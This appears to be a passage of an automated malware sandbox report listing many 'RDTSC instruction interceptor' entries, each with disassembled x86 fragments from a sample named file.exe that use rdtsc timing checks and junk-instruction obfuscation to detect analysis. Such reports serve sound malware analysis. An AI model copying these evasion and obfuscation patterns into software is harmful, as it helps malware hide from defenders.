Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 759EC2 second address: 759EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 je 00007F701CDC837Ch 0x0000000f jmp 00007F701CDC8382h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 759EEF second address: 759EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75A068 second address: 75A08F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8387h 0x00000007 jc 00007F701CDC8382h 0x0000000d jno 00007F701CDC8376h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75D1E7 second address: 75D1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75D1EB second address: 75D2D0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jmp 00007F701CDC8384h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ebx 0x00000016 jo 00007F701CDC838Ch 0x0000001c jmp 00007F701CDC8386h 0x00000021 pop ebx 0x00000022 mov eax, dword ptr [eax] 0x00000024 js 00007F701CDC8382h 0x0000002a jg 00007F701CDC837Ch 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push ecx 0x00000035 jmp 00007F701CDC837Dh 0x0000003a pop ecx 0x0000003b pop eax 0x0000003c push 00000003h 0x0000003e mov dword ptr [ebp+122D18C2h], eax 0x00000044 push 00000000h 0x00000046 mov esi, dword ptr [ebp+122D2A17h] 0x0000004c push 00000003h 0x0000004e mov esi, dword ptr [ebp+122D2CA3h] 0x00000054 sub dx, BCFBh 0x00000059 call 00007F701CDC8379h 0x0000005e push eax 0x0000005f jmp 00007F701CDC837Fh 0x00000064 pop eax 0x00000065 push eax 0x00000066 jmp 00007F701CDC8384h 0x0000006b mov eax, dword ptr [esp+04h] 0x0000006f jmp 00007F701CDC8380h 0x00000074 mov eax, dword ptr [eax] 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F701CDC8387h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75D2D0 second address: 75D2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F701CDA8A66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75D2DA second address: 75D2DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75D2DE second address: 75D352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F701CDA8A79h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F701CDA8A68h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c and dl, FFFFFFD4h 0x0000002f jmp 00007F701CDA8A73h 0x00000034 lea ebx, dword ptr [ebp+1244F0D6h] 0x0000003a xor esi, dword ptr [ebp+122D2A3Fh] 0x00000040 xchg eax, ebx 0x00000041 jg 00007F701CDA8A74h 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75D410 second address: 75D443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D29D7h] 0x00000017 push 00000000h 0x00000019 mov ecx, edi 0x0000001b call 00007F701CDC8379h 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop ecx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D443 second address: 75D494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F701CDA8A72h 0x00000008 jne 00007F701CDA8A66h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F701CDA8A74h 0x00000018 pushad 0x00000019 jnp 00007F701CDA8A66h 0x0000001f jnp 00007F701CDA8A66h 0x00000025 popad 0x00000026 popad 0x00000027 mov eax, dword ptr [esp+04h] 0x0000002b jc 00007F701CDA8A74h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D494 second address: 75D498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D498 second address: 75D53F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jo 00007F701CDA8A6Eh 0x0000000e jc 00007F701CDA8A68h 0x00000014 pushad 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jnl 00007F701CDA8A6Eh 0x00000020 pop eax 0x00000021 xor esi, 07F5B91Ch 0x00000027 push 00000003h 0x00000029 jmp 00007F701CDA8A73h 0x0000002e push 00000000h 0x00000030 push 00000003h 0x00000032 mov dword ptr [ebp+122D1C12h], eax 0x00000038 mov esi, dword ptr [ebp+122D2B27h] 0x0000003e push A479E08Ah 0x00000043 push edi 0x00000044 pushad 0x00000045 jmp 00007F701CDA8A72h 0x0000004a push ecx 0x0000004b pop ecx 0x0000004c popad 0x0000004d pop edi 0x0000004e add dword ptr [esp], 1B861F76h 0x00000055 xor esi, dword ptr [ebp+122D2A97h] 0x0000005b lea ebx, dword ptr [ebp+1244F0DFh] 0x00000061 call 00007F701CDA8A72h 0x00000066 sub si, EDFFh 0x0000006b pop ecx 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jp 00007F701CDA8A68h 0x00000075 push ecx 0x00000076 pop ecx 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D5D0 second address: 75D5DA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D5DA second address: 75D5DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D5DF second address: 75D602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jg 00007F701CDC837Ch 0x0000000e push 00000000h 0x00000010 mov si, bx 0x00000013 push F1F24E8Fh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D602 second address: 75D606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D606 second address: 75D664 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a add dword ptr [esp], 0E0DB1F1h 0x00000011 mov dword ptr [ebp+122D27F9h], esi 0x00000017 push 00000003h 0x00000019 sub dword ptr [ebp+1244A8DEh], eax 0x0000001f push 00000000h 0x00000021 or dh, 0000002Eh 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F701CDC8378h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 clc 0x00000041 push 5CC3C9C1h 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D664 second address: 75D669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D669 second address: 75D6AF instructions: 0x00000000 rdtsc 0x00000002 je 00007F701CDC837Ch 0x00000008 jbe 00007F701CDC8376h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 add dword ptr [esp], 633C363Fh 0x00000017 lea ebx, dword ptr [ebp+1244F0EAh] 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F701CDC8378h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D6AF second address: 75D6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D6B3 second address: 75D6BD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F701CDC8376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DFA0 second address: 77DFB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F701CDA8A88h 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BF44 second address: 77BF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BF48 second address: 77BF7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A78h 0x00000007 jmp 00007F701CDA8A73h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BF7F second address: 77BF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BF85 second address: 77BF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F701CDA8A68h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C297 second address: 77C2BA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F701CDC8376h 0x00000008 jmp 00007F701CDC8381h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F701CDC837Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C6B0 second address: 77C6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C6B5 second address: 77C6BF instructions: 0x00000000 rdtsc 0x00000002 je 00007F701CDC837Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CFEF second address: 77D03C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A79h 0x00000007 jbe 00007F701CDA8A66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jmp 00007F701CDA8A6Fh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop ecx 0x00000018 pushad 0x00000019 jmp 00007F701CDA8A74h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D736 second address: 77D749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F701CDC837Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D749 second address: 77D754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D754 second address: 77D758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D758 second address: 77D75C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DE32 second address: 77DE38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78214A second address: 78217D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c js 00007F701CDA8A7Bh 0x00000012 pushad 0x00000013 jnl 00007F701CDA8A66h 0x00000019 jmp 00007F701CDA8A6Dh 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 jnc 00007F701CDA8A74h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78217D second address: 782181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782261 second address: 782265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782265 second address: 78226B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7835D4 second address: 7835E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A71h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F361 second address: 74F37F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F701CDC8387h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F37F second address: 74F3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F701CDA8A76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F701CDA8A72h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74351D second address: 74352B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC837Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74352B second address: 743551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F701CDA8A68h 0x0000000c push esi 0x0000000d pop esi 0x0000000e jns 00007F701CDA8A72h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743551 second address: 743555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743555 second address: 743559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A362 second address: 78A37A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F701CDC8376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A37A second address: 78A3A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDA8A79h 0x00000007 jp 00007F701CDA8A66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A3A0 second address: 78A3A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A3A6 second address: 78A3B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F701CDA8A66h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A3B1 second address: 78A3B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A51E second address: 78A522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A522 second address: 78A540 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A540 second address: 78A546 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743541 second address: 743547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743547 second address: 743551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B303 second address: 78B307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B307 second address: 78B30D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B92C second address: 78B932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B932 second address: 78B936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B936 second address: 78B95E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F701CDC8387h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnc 00007F701CDC8384h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78BFB5 second address: 78BFCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F701CDA8A68h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C129 second address: 78C12F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C12F second address: 78C133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C133 second address: 78C145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F701CDC8376h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C943 second address: 78C94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E422 second address: 78E426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E426 second address: 78E42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DC41 second address: 78DC5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F701CDC837Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EFAE second address: 78EFB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F701CDA8A66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EFB8 second address: 78EFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EFBC second address: 78F007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F701CDA8A68h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov edi, ebx 0x00000029 push 00000000h 0x0000002b mov esi, dword ptr [ebp+122D1BF3h] 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push edi 0x00000035 jmp 00007F701CDA8A6Ah 0x0000003a pop edi 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F007 second address: 78F00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790467 second address: 7904AD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F701CDA8A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e add dword ptr [ebp+1244BAB2h], ecx 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D2190h] 0x0000001c pushad 0x0000001d js 00007F701CDA8A6Bh 0x00000023 xor dl, FFFFFFDEh 0x00000026 popad 0x00000027 push 00000000h 0x00000029 mov di, dx 0x0000002c xchg eax, ebx 0x0000002d push edx 0x0000002e push ecx 0x0000002f jg 00007F701CDA8A66h 0x00000035 pop ecx 0x00000036 pop edx 0x00000037 push eax 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b jbe 00007F701CDA8A66h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792626 second address: 79263E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F701CDC8384h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79263E second address: 79264D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79264D second address: 792651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792651 second address: 792657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 792657 second address: 79265D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79265D second address: 792661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790D04 second address: 790D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
